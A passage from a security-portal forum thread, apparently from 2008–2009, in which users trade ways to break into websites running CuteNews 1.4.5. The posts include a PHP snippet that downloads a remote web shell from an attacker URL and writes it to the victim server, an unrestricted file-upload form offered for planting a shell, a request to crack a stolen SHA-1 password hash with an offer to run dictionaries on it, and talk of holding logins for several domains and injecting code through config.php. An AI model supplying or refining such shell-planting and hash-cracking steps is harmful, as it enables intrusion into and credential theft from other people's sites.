Waraxe IT Security Portal
Login or Register
August 31, 2026
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 522
Members: 0
Total: 522
Full disclosure
CyberDanube Security Research 20260611-0 | Multiple Denial of Service Vulnerabilities in Dahua IPC/SD/NVR/XVR/EVS/VTO/VT H/ASI/TPC Camera Series
Multiple Integer Overflows in U-Boot Filesystem Parsing(CVE-2025-70290 through CVE-2025-70293)
[ADVISORY] Multiple Integer Overflows in U-Boot FilesystemParsing (CVE-2025-70290 through CVE-2025-70293)
JSON Deserialiser Unconstrained Resource Consumption Proof ofConcept
Dovecot Security Advisory 3/2026
FD - Half-click unauthenticated remote code execution on Horde Groupware IMP (from a stored XSS)
[NotCVE-2026-0013] CHIRP Kenwood ITM Driver Eval Injection Allows Arbitrary Code Execution via Crafted Radio File
[NotCVE-2026-0012] EmpManageX Hardcoded Administrative Credentials in Login API Allow Full Access to Employee Records
[NotCVE-2026-0011] Nmap 7.99 and Earlier nselib/packet.lua Zero-Length TCP Option Infinite Loop Allows Remote Denial of Service
[NotCVE-2026-0010] Barrier 2.4.0 for Windows Unauthenticated IPC Command Execution Allows Local Privilege Escalation to SYSTEM
[NotCVE-2026-0009] NitroShare Desktop 0.3.4 Path Traversal Allows LAN-Adjacent Arbitrary File Write
Escargot v4.3.0-214-gfaee4437 Unauthenticated Remote Debugger Allows Arbitrary JavaScript Evaluation and Local File Disclosure
Escargot v4.3.0-214-gfaee4437 OS Command Injection in Crash Handler via Unsanitized Executable Path
Escargot v4.3.0-214-gfaee4437 Debugger WebSocket Off-by-One Stack Buffer Overflow
UltraJSON v5.13.0-6-g733f9e1 Length-Boundary Violation Causes Out-of-Bounds Read During Incomplete JSON Parsing
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other software -> Cutenews 1.4.5 Goto page Previous1, 2
Post new topicReply to topic View previous topic :: View next topic
PostPosted: Tue Aug 19, 2008 4:58 pm Reply with quote
xxxmystikxxx
Regular user
Regular user
Joined: Aug 17, 2008
Posts: 8
Location: C:/Lineage2/system/l2.exe




i find this in google
$file = file_get_contents('url to yor shell');
$brd = fopen('file2.php','w+');
$write = fwrite($brd, $file);
i insert it and see his config.php then connet to his database.
And now a question: How to decode accounts passwords?
View user's profile Send private message
PostPosted: Wed Aug 20, 2008 2:45 pm Reply with quote
xxxmystikxxx
Regular user
Regular user
Joined: Aug 17, 2008
Posts: 8
Location: C:/Lineage2/system/l2.exe




for example how to decode this RDkMcWDQld3vxLdlVnsHLGRhJ5Y=
View user's profile Send private message
PostPosted: Wed Aug 20, 2008 9:17 pm Reply with quote
lenny
Valuable expert
Valuable expert
Joined: May 15, 2008
Posts: 275




http://makcoder.sourceforge.net/demo/base64.php Smile
View user's profile Send private message
PostPosted: Thu Aug 21, 2008 6:24 am Reply with quote
xxxmystikxxx
Regular user
Regular user
Joined: Aug 17, 2008
Posts: 8
Location: C:/Lineage2/system/l2.exe




lenny wrote:
http://makcoder.sourceforge.net/demo/base64.php Smile

idoesnt decode this because it is base64 decoder but i need SHA-1(base64)
View user's profile Send private message
PostPosted: Fri Aug 22, 2008 1:42 pm Reply with quote
lenny
Valuable expert
Valuable expert
Joined: May 15, 2008
Posts: 275




oh ok, well in that case you need to submit it in the hash cracking forum. I will run it through my dictionaries now though Smile
View user's profile Send private message
PostPosted: Sat Aug 30, 2008 3:56 am Reply with quote
Romi
Beginner
Beginner
Joined: Apr 06, 2008
Posts: 3




xxxmystikxxx wrote:
i find this in google
$file = file_get_contents('url to yor shell');
$brd = fopen('file2.php','w+');
$write = fwrite($brd, $file);


Hey, m8!
Can you explain me pls, how can i insert this code in template?
I have try upload form but is not work...
this is the form code:
Code:

<form enctype="multipart/form-data" method=POST >
<input type=hidden name=MAX_FILE_SIZE value=1024000>Send this file:
<input name=userfile type=file>
<input type=submit value="Send File"></form>
<?php if(!empty($_FILES[userfile][tmp_name])){
if(move_uploaded_file($_FILES[userfile][tmp_name],"data/upimages/".$_FILES[userfile][name])){
echo "<br> <br> fFile Uploaded ";}}
?>

but dosn't work ,can anyone help me?

P.S.
I have try simple code = phpinfo(); in template
not work too, some sugestion?
View user's profile Send private message
PostPosted: Sat Aug 30, 2008 5:12 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Read whole thread. Laughing
View user's profile Send private message
PostPosted: Sat Aug 30, 2008 10:13 pm Reply with quote
Romi
Beginner
Beginner
Joined: Apr 06, 2008
Posts: 3




koko wrote:
Read whole thread. Laughing


OK. m8, i have read all thread about cutenews 1.4.5 and i can't find nothing...

I have try all solution, nothing...
Have more 8 domain account and passw.., but i cant insert shell...

i have try in more domain, and nothing....
PHP code is not work in template...
Some domain are patched from "Napas", may be this patch is not vulnerable to shell?

I have try with immage too = nothing...

Give me an idea man, if you can....
Thx in advance.....
View user's profile Send private message
PostPosted: Thu Jun 04, 2009 10:10 pm Reply with quote
JasonB
Regular user
Regular user
Joined: Apr 05, 2009
Posts: 23




Hmm, I followed the advice here but it doesn't seem to work.

I get a parsing error if I try to put php into the template, I can get phpinfo to display but I'm lost for what to do now..
View user's profile Send private message
PostPosted: Sat Sep 12, 2009 4:59 am Reply with quote
bizzumbottom
Active user
Active user
Joined: Sep 09, 2009
Posts: 27




So I have access, but .tpl templates can't execute php code.

So the other two choices are to inject code via creating a new user, or changing config.php

Either way, how would I do so properly? I already crashed the last CuteNews site I got into.
View user's profile Send private message
Cutenews 1.4.5
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 2 of 2
Goto page Previous1, 2
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.039 Seconds